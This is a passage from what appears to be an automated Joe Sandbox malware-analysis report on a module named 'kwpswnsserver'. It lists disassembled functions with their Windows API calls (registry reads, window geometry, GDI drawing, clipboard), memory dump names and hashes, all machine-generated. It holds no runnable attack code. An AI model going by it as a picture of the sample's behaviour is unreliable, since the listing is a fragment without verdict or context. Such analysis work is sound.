                                                                  • RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,00000000,?,?,00000000,E343E0B4,?,?,?,?,6C9EBED1,000000FF), ref: 6C89A83F
                                                                  • RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,6C9EBED1,000000FF), ref: 6C89A87B
                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,6C9EBED1,000000FF), ref: 6C89A895
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CloseQueryValue$PrivateProfileString
                                                                  • String ID:
                                                                  • API String ID: 2114517702-0
                                                                  • Opcode ID: 5c039345cd5bfec340a4389f47dc003b742f6ae2da1967b09385bb73ee5280de
                                                                  • Instruction ID: 7874ed3cf2c7aa15a0e9e801544f96012e898e64198aefb80b287035869dbee1
                                                                  • Opcode Fuzzy Hash: 5c039345cd5bfec340a4389f47dc003b742f6ae2da1967b09385bb73ee5280de
                                                                  • Instruction Fuzzy Hash: 51416F71900329DFDB35CF18CD48AEEB7B8EB44314F0049AAE419A6A81DB349E46CF60
                                                                  Function 6C8BABB8 Relevance: 6.1, APIs: 4, Instructions: 111windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 6C8BAC51
                                                                  • ScreenToClient.USER32(000000FF,?), ref: 6C8BAC61
                                                                  • PtInRect.USER32(000000D8,?,?), ref: 6C8BAC74
                                                                  • PostMessageW.USER32(000000FF,00000010,00000000,00000000), ref: 6C8BAC8F
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ClientCursorMessagePostRectScreen
                                                                  • String ID:
                                                                  • API String ID: 1913696736-0
                                                                  • Opcode ID: 077fe2ddd8193158ab3e5c0d63026dd8a40b69416fae4a346167e2c0271df5b8
                                                                  • Instruction ID: 836e285202aa6de59981d9ddf139cec94e62bfa681ffd80f9b64d5303cd753cf
                                                                  • Opcode Fuzzy Hash: 077fe2ddd8193158ab3e5c0d63026dd8a40b69416fae4a346167e2c0271df5b8
                                                                  • Instruction Fuzzy Hash: 2131293570021AEFCF269F64CA54AAE7B75FF48758F214665E82AE7350EB30AC01CB50
                                                                  Function 6C91E1CA Relevance: 6.1, APIs: 4, Instructions: 109windowstringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C91E1D1
                                                                  • SendMessageW.USER32(?,00000421,00000001,?), ref: 6C91E268
                                                                  • SendMessageW.USER32(?,00000421,00000001,?), ref: 6C91E27D
                                                                  • lstrcpyW.KERNEL32(00000000,00000010,00000000,00000010,6C8B51F1,00000000,?,00000002,?,?), ref: 6C91E2AC
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$H_prolog3lstrcpy
                                                                  • String ID:
                                                                  • API String ID: 3361160815-0
                                                                  • Opcode ID: 4032ae5a6b78483dc335efb4fd087618083ef2dd155dc8d533e9f4162f71bef5
                                                                  • Instruction ID: 40e3b77033ddf92b28129b66955844ffca4d94cdf35ca401cda68a273080290e
                                                                  • Opcode Fuzzy Hash: 4032ae5a6b78483dc335efb4fd087618083ef2dd155dc8d533e9f4162f71bef5
                                                                  • Instruction Fuzzy Hash: 74418F71A0524A9BEF14CF68CD99BEE77B5BF04318F204828E5259BED0DB30D946CB90
                                                                  Function 6C89DCB0 Relevance: 6.1, APIs: 4, Instructions: 108windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C89DCB7
                                                                  • GetClientRect.USER32(6C9FD7BC,?), ref: 6C89DD06
                                                                    • Part of subcall function 6C88B473: GetScrollPos.USER32(?,?), ref: 6C88B49F
                                                                    • Part of subcall function 6C8A6555: GetModuleHandleW.KERNEL32(uxtheme.dll,?,6C89DD38,?,?,?,?,?,?,?,?,00000008), ref: 6C8A6564
                                                                    • Part of subcall function 6C8A6555: GetProcAddress.KERNEL32(00000000,BufferedPaintInit), ref: 6C8A6574
                                                                    • Part of subcall function 6C8A6555: EncodePointer.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000008), ref: 6C8A657D
                                                                  • CreateCompatibleDC.GDI32(?), ref: 6C89DDA2
                                                                  • CreateCompatibleBitmap.GDI32(?,?,?), ref: 6C89DDC8
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CompatibleCreate$AddressBitmapClientEncodeH_prolog3HandleModulePointerProcRectScroll
                                                                  • String ID:
                                                                  • API String ID: 1015973060-0
                                                                  • Opcode ID: 0870bf3fbfb16b9186e736d60d03dac75cd1980486fe25651f74633dfd4a6ed8
                                                                  • Instruction ID: f59fe66cc0f82c103ebfab7df5bf654da1f63d5c27eee2d4e31c376a6434f896
                                                                  • Opcode Fuzzy Hash: 0870bf3fbfb16b9186e736d60d03dac75cd1980486fe25651f74633dfd4a6ed8
                                                                  • Instruction Fuzzy Hash: 63414DB1601606AFDB24DF6DCA84A99BBB4BF08309B00CA2EE41987F50D770E955CF94
                                                                  Function 6C88E82F Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6C89BA82: GetWindowLongW.USER32(F04D8BF4,000000F0), ref: 6C89BA8F
                                                                  • GetClientRect.USER32(?,?), ref: 6C88E897
                                                                  • IsMenu.USER32(00000000), ref: 6C88E8D3
                                                                  • AdjustWindowRectEx.USER32(?,00000000,00000000,?), ref: 6C88E8EB
                                                                  • GetClientRect.USER32(?,?), ref: 6C88E933
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$ClientWindow$AdjustLongMenu
                                                                  • String ID:
                                                                  • API String ID: 3435883281-0
                                                                  • Opcode ID: 5d389a6e1d4cfb8fb9c058c0dabfc896a1c194ac05573fa8b4b7de551bab59f6
                                                                  • Instruction ID: 53a2188609c29981484a9abaa49740610b5db76aa04962f9d6d769265e2f5a6c
                                                                  • Opcode Fuzzy Hash: 5d389a6e1d4cfb8fb9c058c0dabfc896a1c194ac05573fa8b4b7de551bab59f6
                                                                  • Instruction Fuzzy Hash: DA318735B0131AAFDB24DBA9CE54ABEB7B9EF45218F144529E901E7A40DB30AD44C790
                                                                  Function 6C8B8F9A Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C8B8FA1
                                                                  • IsWindow.USER32(?), ref: 6C8B9049
                                                                  • GetParent.USER32(?), ref: 6C8B9069
                                                                  • GetParent.USER32(?), ref: 6C8B9085
                                                                    • Part of subcall function 6C8FF1BA: __EH_prolog3_catch_GS.LIBCMT ref: 6C8FF1C1
                                                                    • Part of subcall function 6C8FF1BA: CreateCompatibleDC.GDI32(00000000), ref: 6C8FF201
                                                                    • Part of subcall function 6C8FF1BA: CreateCompatibleBitmap.GDI32(?,?,?), ref: 6C8FF223
                                                                    • Part of subcall function 6C8FF1BA: FillRect.USER32(?,?,?), ref: 6C8FF26D
                                                                    • Part of subcall function 6C8FF1BA: OpenClipboard.USER32(?), ref: 6C8FF29D
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CompatibleCreateParent$BitmapClipboardFillH_prolog3H_prolog3_catch_OpenRectWindow
                                                                  • String ID:
                                                                  • API String ID: 837828968-0
                                                                  • Opcode ID: 925db96deca268de895467c0c32713d55c167e715c9954816a614a283b76251b
                                                                  • Instruction ID: 136fde7fb191a43c1b9c917fb2bea8fdc66ddbad3c5c65fb76b4ff90076f974c
                                                                  • Opcode Fuzzy Hash: 925db96deca268de895467c0c32713d55c167e715c9954816a614a283b76251b
                                                                  • Instruction Fuzzy Hash: 8C31BF32605702ABDB389F7DCB50A9B77B9AF6465C7104C3AE505A7F50EB32E8068B50
                                                                  Function 6C8CCA29 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 6C8CCA63
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 6C8CCAA4
                                                                  • InflateRect.USER32(?,?,?), ref: 6C8CCAD5
                                                                  • InflateRect.USER32(?,00000001,00000001), ref: 6C8CCB00
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: InflateRect
                                                                  • String ID:
                                                                  • API String ID: 2073123975-0
                                                                  • Opcode ID: 636355c56e1a8b0c26ed85ff8b3430349f8565cb8efff1be259322471f435d61
                                                                  • Instruction ID: eb95454ef6ecdf02441856c9d3a0c96192056e28af11200e843304bc88aaaa09
                                                                  • Opcode Fuzzy Hash: 636355c56e1a8b0c26ed85ff8b3430349f8565cb8efff1be259322471f435d61
                                                                  • Instruction Fuzzy Hash: 38316F7220125DAFCB10EFACCE84CDF736CAF44325B050A76B911D7691DB74E8588760
                                                                  Function 6C8A9CEF Relevance: 6.1, APIs: 4, Instructions: 96COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetRectEmpty.USER32(6C8AA2D9), ref: 6C8A9CFB
                                                                  • GetClientRect.USER32(00000000,6C8AA2D9), ref: 6C8A9D1B
                                                                  • GetParent.USER32(00000000), ref: 6C8A9D3A
                                                                  • OffsetRect.USER32(6C8AA2D9,00000000,00000000), ref: 6C8A9DBC
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$ClientEmptyOffsetParent
                                                                  • String ID:
                                                                  • API String ID: 3819956977-0
                                                                  • Opcode ID: ed792cc98513d5f42fa67702e2f0fd19f8bedd8231a15e20f937520c908eafe3
                                                                  • Instruction ID: bab5e7c3011d3628b112f69a31713315b4eaaeda849aaede712b9e04e400fcad
                                                                  • Opcode Fuzzy Hash: ed792cc98513d5f42fa67702e2f0fd19f8bedd8231a15e20f937520c908eafe3
                                                                  • Instruction Fuzzy Hash: D731B371204602EFD728DF68CA94E65B7A4FF45359710862DE41ACBA80EB31EC51CBA0
                                                                  Function 6C98AAA9 Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C98AAB3
                                                                  • CoTaskMemFree.OLE32(?,?,?,?,?,00000000,?,00000040,6C90713C,?,00000000,00000000,0000005C), ref: 6C98AB57
                                                                  • CoTaskMemFree.OLE32(?,?,?,00000000,?,00000040,6C90713C,?,00000000,00000000,0000005C), ref: 6C98AB97
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,00000003,000000FF,00000000,?,00000000,?,00000040,6C90713C,?,00000000,00000000), ref: 6C98ABB5
                                                                    • Part of subcall function 6C880847: __EH_prolog3.LIBCMT ref: 6C88084E
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: FreeTask$CreateGlobalH_prolog3H_prolog3_Stream
                                                                  • String ID:
                                                                  • API String ID: 655328227-0
                                                                  • Opcode ID: 7093a3ab18cc9a173d65ec6c8baa009965b090ff52982695dbe8dd7b2c90055b
                                                                  • Instruction ID: 3c85800be9dab3f60164c667856ad4cbad293ce4629fbb86d980f725c3b48105
                                                                  • Opcode Fuzzy Hash: 7093a3ab18cc9a173d65ec6c8baa009965b090ff52982695dbe8dd7b2c90055b
                                                                  • Instruction Fuzzy Hash: AA31D430A0521DABDF249F58CC88BDEB779AF10718F0005A9E41997B90DB31DE85DBA0
                                                                  Function 6C91C4C3 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 6C91C52C
                                                                  • EqualRect.USER32(?,?), ref: 6C91C552
                                                                  • BeginDeferWindowPos.USER32(?), ref: 6C91C55F
                                                                  • EndDeferWindowPos.USER32(00000000), ref: 6C91C585
                                                                    • Part of subcall function 6C90BCC5: GetWindowRect.USER32(?,?), ref: 6C90BCD9
                                                                    • Part of subcall function 6C90BCC5: GetParent.USER32(?), ref: 6C90BD2F
                                                                    • Part of subcall function 6C90BCC5: GetParent.USER32(?), ref: 6C90BD42
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rect$DeferParent$BeginEqual
                                                                  • String ID:
                                                                  • API String ID: 2054780619-0
                                                                  • Opcode ID: 754780ab5d2fa4a93163286707cf51738cd6e3458a5fa89f7545d92bac62dfee
                                                                  • Instruction ID: e6edbbf947cc3bc4e0d1c2f44ec6261a6e58e971a5bf79aac7c8304b165e8194
                                                                  • Opcode Fuzzy Hash: 754780ab5d2fa4a93163286707cf51738cd6e3458a5fa89f7545d92bac62dfee
                                                                  • Instruction Fuzzy Hash: EE317171A0461D9BCF04EF75C9949DEBBB9BF1D348B50826AE406E3A40EB30E945CB60
                                                                  Function 6C9DEED9 Relevance: 6.1, APIs: 4, Instructions: 82COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6C9D9411: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6C9DCBF9,?,00000000,-00000008), ref: 6C9D9472
                                                                  • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 6C9DEF3D
                                                                  • __dosmaperr.LIBCMT ref: 6C9DEF44
                                                                  • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6C9DEF7E
                                                                  • __dosmaperr.LIBCMT ref: 6C9DEF85
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                  • String ID:
                                                                  • API String ID: 1913693674-0
                                                                  • Opcode ID: 941f9021e84c79a7e7b4215005694f43c09c9a56532b8aeae09b02aa5dcdc6fd
                                                                  • Instruction ID: 6f903875604a7fbf37a85ec254c8fafc191524557c9ca6bd4bdd68906f2dc3e1
                                                                  • Opcode Fuzzy Hash: 941f9021e84c79a7e7b4215005694f43c09c9a56532b8aeae09b02aa5dcdc6fd
                                                                  • Instruction Fuzzy Hash: 7821A471604A16AFD7109F6ACC8095AF7ACEF2136C706C618F858A7A50EB30FC119BD2
                                                                  Function 6C88497F Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RedrawWindow.USER32(00000041,?,?,00000041), ref: 6C8849A2
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 6C8849E5
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: InflateRectRedrawWindow
                                                                  • String ID:
                                                                  • API String ID: 3190756164-0
                                                                  • Opcode ID: 8c11fdf6df36700a2f13a7a46c87d4c7050c948d3ad7f6d609b8b7319af96a94
                                                                  • Instruction ID: db21bb6ab78f236ef41a763afaa1329ec3dc7e378e4bd72ac8bba76ca84e1a1d
                                                                  • Opcode Fuzzy Hash: 8c11fdf6df36700a2f13a7a46c87d4c7050c948d3ad7f6d609b8b7319af96a94
                                                                  • Instruction Fuzzy Hash: 6C21517160420EEBCF14DFE8CE54CAE7779BB463687508B29B921A71D0DB35990ADB20
                                                                  Function 6C8BCB57 Relevance: 6.1, APIs: 4, Instructions: 81windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetClientRect.USER32(?,?), ref: 6C8BCB79
                                                                  • PtInRect.USER32(?,?,?), ref: 6C8BCBA3
                                                                    • Part of subcall function 6C8BA812: ScreenToClient.USER32(?,?), ref: 6C8BA82E
                                                                    • Part of subcall function 6C8BA812: GetParent.USER32(?), ref: 6C8BA83E
                                                                    • Part of subcall function 6C8BA812: GetClientRect.USER32(?,?), ref: 6C8BA8D1
                                                                    • Part of subcall function 6C8BA812: MapWindowPoints.USER32(?,?,?,00000002), ref: 6C8BA8E3
                                                                    • Part of subcall function 6C8BA812: PtInRect.USER32(?,?,?), ref: 6C8BA8F3
                                                                  • MapWindowPoints.USER32(?,?,?,00000001), ref: 6C8BCBCC
                                                                  • SendMessageW.USER32(?,00000202,?,?), ref: 6C8BCBEB
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
